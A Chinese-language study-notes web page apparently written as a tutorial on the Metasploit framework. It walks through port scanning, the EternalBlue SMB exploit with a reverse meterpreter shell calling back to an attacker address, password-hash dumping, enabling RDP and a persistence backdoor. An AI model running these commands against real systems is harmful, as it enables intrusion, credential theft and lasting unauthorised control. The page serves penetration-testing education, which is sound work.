
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
        <meta name="description" content="网络安全工程师的学习笔记">
      
      
        <meta name="author" content="Josh">
      
      
      
        <link rel="prev" href="../Cryptography/">
      
      
        <link rel="next" href="../Network%20Security%20Equipment/">
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.6.22">
    
    
      
        <title>Metasploit - 网络安全工程师的学习笔记</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.84d31ad4.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="teal">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#metasploit" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../.." title="网络安全工程师的学习笔记" class="md-header__button md-logo" aria-label="网络安全工程师的学习笔记" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            网络安全工程师的学习笔记
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Metasploit
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="teal"  aria-hidden="true"  type="radio" name="__palette" id="__palette_0">
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="blue" data-md-color-accent="light-blue"  aria-hidden="true"  type="radio" name="__palette" id="__palette_1">
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
      
      
        <label class="md-header__button md-icon" for="__search">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        </label>
        <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
        <div class="md-search__suggest" data-md-component="search-suggest"></div>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
      
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
            
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../Coding%20Language/C/" class="md-tabs__link">
          
  
  
  Coding Language

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../Computer%20Fundamentals/Linux/" class="md-tabs__link">
          
  
  
  Computer Fundamentals

        </a>
      </li>
    
  

      
        
  
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="../AI%20Security/" class="md-tabs__link">
          
  
  
  Cyber Security

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../Testing/Black-box%20Testing/" class="md-tabs__link">
          
  
  
  Testing

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


  

<nav class="md-nav md-nav--primary md-nav--lifted md-nav--integrated" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="网络安全工程师的学习笔记" class="md-nav__button md-logo" aria-label="网络安全工程师的学习笔记" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    网络安全工程师的学习笔记
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    
    
    
    
      
      
        
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_1" >
        
          
          <label class="md-nav__link" for="__nav_1" id="__nav_1_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Coding Language
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_1_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_1">
            <span class="md-nav__icon md-icon"></span>
            Coding Language
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../Coding%20Language/C/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    C
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../Coding%20Language/Python/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Python
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
      
      
        
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" >
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Computer Fundamentals
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            Computer Fundamentals
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../Computer%20Fundamentals/Linux/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Linux
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../Computer%20Fundamentals/Operating%20System/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Operating System
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../Computer%20Fundamentals/Protocol/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Protocol
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../Computer%20Fundamentals/SQL/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    SQL
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
    
  
  
  
    
    
    
    
      
        
        
      
      
        
      
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" checked>
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="">
            
  
  
  <span class="md-ellipsis">
    Cyber Security
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            Cyber Security
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../AI%20Security/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    AI Security
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../Attack%20and%20Defence/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Attack and Defence
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../Cryptography/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Cryptography
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
    
  
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  
  <span class="md-ellipsis">
    Metasploit
    
  </span>
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  
  <span class="md-ellipsis">
    Metasploit
    
  </span>
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#metasploit" class="md-nav__link">
    <span class="md-ellipsis">
      Metasploit的核心功能
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#windowsmetasploitmsfconsole" class="md-nav__link">
    <span class="md-ellipsis">
      Windows下Metasploit的基础使用流程（以msfconsole为例）
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Windows下Metasploit的基础使用流程（以msfconsole为例）">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#1-metasploit" class="md-nav__link">
    <span class="md-ellipsis">
      1. 启动Metasploit
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#2" class="md-nav__link">
    <span class="md-ellipsis">
      2. 信息收集（以扫描目标开放服务为例）
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#3-smb" class="md-nav__link">
    <span class="md-ellipsis">
      3. 漏洞利用（以SMB漏洞“永恒之蓝”为例）
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#4-meterpreter" class="md-nav__link">
    <span class="md-ellipsis">
      4. 后渗透操作（通过meterpreter）
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#5-metasploit" class="md-nav__link">
    <span class="md-ellipsis">
      5. 退出Metasploit
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#_1" class="md-nav__link">
    <span class="md-ellipsis">
      常用技巧
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../Network%20Security%20Equipment/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Network Security Equipment
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../OS%20Security/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    OS Security
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../SonarQube/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    SonarQube
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../SQLmap/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    SQLmap
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../Vulnerabilities/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Vulnerabilities
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
      
      
        
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
        
          
          <label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Testing
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4">
            <span class="md-nav__icon md-icon"></span>
            Testing
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../Testing/Black-box%20Testing/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Black-box Testing
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  



  <h1>Metasploit</h1>

<p>Metasploit是一款开源的渗透测试框架，集成了漏洞利用模块、Payload生成器、后渗透工具等，广泛用于安全测试、漏洞验证和攻防演练。以下从功能介绍和Windows下的基础使用流程展开说明：</p>
<h3 id="metasploit">Metasploit的核心功能<a class="headerlink" href="#metasploit" title="Permanent link">&para;</a></h3>
<ol>
<li><strong>漏洞利用模块（Exploits）</strong>内置大量针对操作系统（Windows/Linux）、应用软件（如Apache、MySQL）、协议（如SMB、FTP）的漏洞利用代码，覆盖从老旧漏洞（如永恒之蓝）到新型漏洞的验证工具。</li>
<li><strong>攻击载荷（Payloads）</strong>用于在目标系统上执行的恶意代码，如反向连接（让目标主动连接攻击者）、绑定端口（攻击者连接目标开放的端口）、命令执行等，支持多种语言（C、Python等）和加密方式。</li>
<li><strong>辅助模块（Auxiliary）</strong>包括信息收集（端口扫描、服务探测）、漏洞扫描、拒绝服务（DoS）、密码破解等工具，用于渗透测试前期的目标探测和攻击面分析。</li>
<li><strong>后渗透模块（Post）</strong>攻陷目标后使用，如权限提升、敏感信息窃取（密码哈希、浏览器数据）、横向移动（控制局域网内其他主机）、持久化（添加后门确保长期控制）等。</li>
<li><strong>编码器（Encoders）</strong>对Payload进行加密或编码，绕过目标系统的杀毒软件（AV）、防火墙等安全机制。</li>
</ol>
<h3 id="windowsmetasploitmsfconsole">Windows下Metasploit的基础使用流程（以<code>msfconsole</code>为例）<a class="headerlink" href="#windowsmetasploitmsfconsole" title="Permanent link">&para;</a></h3>
<p>Metasploit在Windows下通常通过命令行工具<code>msfconsole</code>操作，以下是一个完整的测试流程（<strong>注意：仅用于合法授权的测试环境！</strong>）：</p>
<h4 id="1-metasploit">1. 启动Metasploit<a class="headerlink" href="#1-metasploit" title="Permanent link">&para;</a></h4>
<ul>
<li>打开“开始菜单”，找到“Metasploit Framework”，点击“msfconsole”启动控制台（或通过命令行进入安装目录，执行<code>msfconsole</code>）。  </li>
<li>启动成功后会显示Metasploit的命令行界面（类似<code>msf6 &gt;</code>）。</li>
</ul>
<h4 id="2">2. 信息收集（以扫描目标开放服务为例）<a class="headerlink" href="#2" title="Permanent link">&para;</a></h4>
<p>假设目标IP为<code>192.168.1.100</code>，先探测其开放的端口和服务：  </p>
<div class="highlight"><pre><span></span><code><span class="c1"># 搜索端口扫描模块（auxiliary/scanner/portscan）</span>
msf6<span class="w"> </span>&gt;<span class="w"> </span>search<span class="w"> </span>portscan

<span class="c1"># 使用tcp扫描模块</span>
msf6<span class="w"> </span>&gt;<span class="w"> </span>use<span class="w"> </span>auxiliary/scanner/portscan/tcp

<span class="c1"># 查看模块需要配置的参数</span>
msf6<span class="w"> </span>auxiliary<span class="o">(</span>scanner/portscan/tcp<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span>show<span class="w"> </span>options

<span class="c1"># 设置目标IP（RHOSTS）和扫描端口范围（PORTS）</span>
msf6<span class="w"> </span>auxiliary<span class="o">(</span>scanner/portscan/tcp<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>RHOSTS<span class="w"> </span><span class="m">192</span>.168.1.100
msf6<span class="w"> </span>auxiliary<span class="o">(</span>scanner/portscan/tcp<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>PORTS<span class="w"> </span><span class="m">1</span>-1000

<span class="c1"># 运行扫描</span>
msf6<span class="w"> </span>auxiliary<span class="o">(</span>scanner/portscan/tcp<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span>run
</code></pre></div>
<p>扫描结果会显示目标开放的端口（如80、445等）和对应服务（如HTTP、SMB）。</p>
<h4 id="3-smb">3. 漏洞利用（以SMB漏洞“永恒之蓝”为例）<a class="headerlink" href="#3-smb" title="Permanent link">&para;</a></h4>
<p>若扫描发现目标开放445端口（SMB服务），且可能存在“永恒之蓝”漏洞（CVE-2017-0144）：  </p>
<div class="highlight"><pre><span></span><code><span class="c1"># 搜索永恒之蓝漏洞利用模块</span>
msf6<span class="w"> </span>&gt;<span class="w"> </span>search<span class="w"> </span>eternalblue

<span class="c1"># 使用对应的exploit模块</span>
msf6<span class="w"> </span>&gt;<span class="w"> </span>use<span class="w"> </span>exploit/windows/smb/ms17_010_eternalblue

<span class="c1"># 查看需要配置的参数</span>
msf6<span class="w"> </span>exploit<span class="o">(</span>windows/smb/ms17_010_eternalblue<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span>show<span class="w"> </span>options

<span class="c1"># 设置目标IP（RHOSTS）</span>
msf6<span class="w"> </span>exploit<span class="o">(</span>windows/smb/ms17_010_eternalblue<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>RHOSTS<span class="w"> </span><span class="m">192</span>.168.1.100

<span class="c1"># 设置Payload（这里选择反向连接到攻击者的IP和端口）</span>
<span class="c1"># 假设攻击者IP为192.168.1.200，监听端口4444</span>
msf6<span class="w"> </span>exploit<span class="o">(</span>windows/smb/ms17_010_eternalblue<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>PAYLOAD<span class="w"> </span>windows/x64/meterpreter/reverse_tcp
msf6<span class="w"> </span>exploit<span class="o">(</span>windows/smb/ms17_010_eternalblue<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>LHOST<span class="w"> </span><span class="m">192</span>.168.1.200<span class="w">  </span><span class="c1"># 攻击者IP</span>
msf6<span class="w"> </span>exploit<span class="o">(</span>windows/smb/ms17_010_eternalblue<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>LPORT<span class="w"> </span><span class="m">4444</span><span class="w">          </span><span class="c1"># 攻击者监听端口</span>

<span class="c1"># 执行漏洞利用</span>
msf6<span class="w"> </span>exploit<span class="o">(</span>windows/smb/ms17_010_eternalblue<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span>run
</code></pre></div>
<p>若成功，会获得目标系统的<code>meterpreter</code>会话（一种交互式shell）。</p>
<h4 id="4-meterpreter">4. 后渗透操作（通过meterpreter）<a class="headerlink" href="#4-meterpreter" title="Permanent link">&para;</a></h4>
<p>获得<code>meterpreter</code>会话后，可执行以下操作：  </p>
<div class="highlight"><pre><span></span><code><span class="c1"># 查看当前会话（若有多个）</span>
msf6<span class="w"> </span>&gt;<span class="w"> </span>sessions

<span class="c1"># 进入指定会话（如会话ID为1）</span>
msf6<span class="w"> </span>&gt;<span class="w"> </span>sessions<span class="w"> </span>-i<span class="w"> </span><span class="m">1</span>

<span class="c1"># 在目标系统执行命令（如查看系统信息）</span>
meterpreter<span class="w"> </span>&gt;<span class="w"> </span>sysinfo

<span class="c1"># 查看目标进程</span>
meterpreter<span class="w"> </span>&gt;<span class="w"> </span>ps

<span class="c1"># 窃取密码哈希（需管理员权限）</span>
meterpreter<span class="w"> </span>&gt;<span class="w"> </span>hashdump

<span class="c1"># 开启远程桌面（方便后续控制）</span>
meterpreter<span class="w"> </span>&gt;<span class="w"> </span>run<span class="w"> </span>post/windows/manage/enable_rdp

<span class="c1"># 持久化（添加后门，如创建自启动服务）</span>
meterpreter<span class="w"> </span>&gt;<span class="w"> </span>run<span class="w"> </span>persistence<span class="w"> </span>-X<span class="w"> </span>-i<span class="w"> </span><span class="m">5</span><span class="w"> </span>-p<span class="w"> </span><span class="m">4444</span><span class="w"> </span>-r<span class="w"> </span><span class="m">192</span>.168.1.200
</code></pre></div>
<h4 id="5-metasploit">5. 退出Metasploit<a class="headerlink" href="#5-metasploit" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code><span class="c1"># 退出meterpreter会话（返回msfconsole）</span>
meterpreter<span class="w"> </span>&gt;<span class="w"> </span>background

<span class="c1"># 退出msfconsole</span>
msf6<span class="w"> </span>&gt;<span class="w"> </span><span class="nb">exit</span>
</code></pre></div>
<h3 id="_1">常用技巧<a class="headerlink" href="#_1" title="Permanent link">&para;</a></h3>
<ol>
<li><strong>模块搜索</strong>：使用<code>search [关键词]</code>查找模块（如漏洞名称、服务类型），例如<code>search mysql</code>查找MySQL相关模块。  </li>
<li><strong>参数配置</strong>：<code>show options</code>查看必填参数，<code>set [参数名] [值]</code>设置参数，<code>unset [参数名]</code>取消设置。  </li>
<li><strong>会话管理</strong>：<code>sessions</code>查看所有会话，<code>sessions -i [ID]</code>进入会话，<code>sessions -k [ID]</code>关闭会话。  </li>
<li><strong>更新模块</strong>：通过<code>msfupdate</code>命令更新Metasploit的漏洞库和模块（需联网）。  </li>
</ol>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
          <button type="button" class="md-top md-icon" data-md-component="top" hidden>
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
  Back to top
</button>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    
      
      <script id="__config" type="application/json">{"base": "../..", "features": ["navigation.tabs", "navigation.sections", "toc.integrate", "navigation.top", "search.suggest", "search.highlight"], "search": "../../assets/javascripts/workers/search.973d3a69.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
    
    
      <script src="../../assets/javascripts/bundle.f55a23d4.min.js"></script>
      
    
  </body>
</html>